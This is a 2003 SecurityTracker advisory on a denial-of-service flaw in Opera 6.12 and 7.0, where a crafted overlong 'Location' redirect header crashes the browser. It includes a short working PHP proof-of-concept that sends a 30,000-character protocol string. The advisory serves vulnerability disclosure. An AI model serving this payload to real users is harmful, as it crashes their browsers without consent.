Opera Browser 'Location' Header Flaw Lets Remote Users Crash the Browser
|
|
SecurityTracker Alert ID: 1007319 |
|
SecurityTracker URL: http://securitytracker.com/id/1007319
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 28 2003
|
Impact:
Denial of service via network
|
Exploit Included: Yes
|
Version(s): 6.12, 7.0
|
Description:
A denial of service vulnerability was reported in the Opera web browser in the processing of redirect URLs. A remote user can cause the target user's browser to crash.
dodo (https://www.darkwired.org/) reported that a remote user can send an HTTP response that includes a specially crafted 'Location' redirect header. When the HTTP response is loaded by the target user, the target user's browser will crash, according to the report.
A demonstration exploit PHP script is provided:
<?php
for($i=0; 20000+10000>$i; $i++) $prot.="A";
header("Location: $prot://dd");
?>
|
Impact:
A remote user can create an HTTP response that will crash the browser.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.opera.com/ (Links to External Site)
|
Cause:
Not specified
|
Underlying OS:
BeOS, Linux (Any), MacOS, QNX, UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
|
|
[Original Message Not Available for Viewing]
|
|
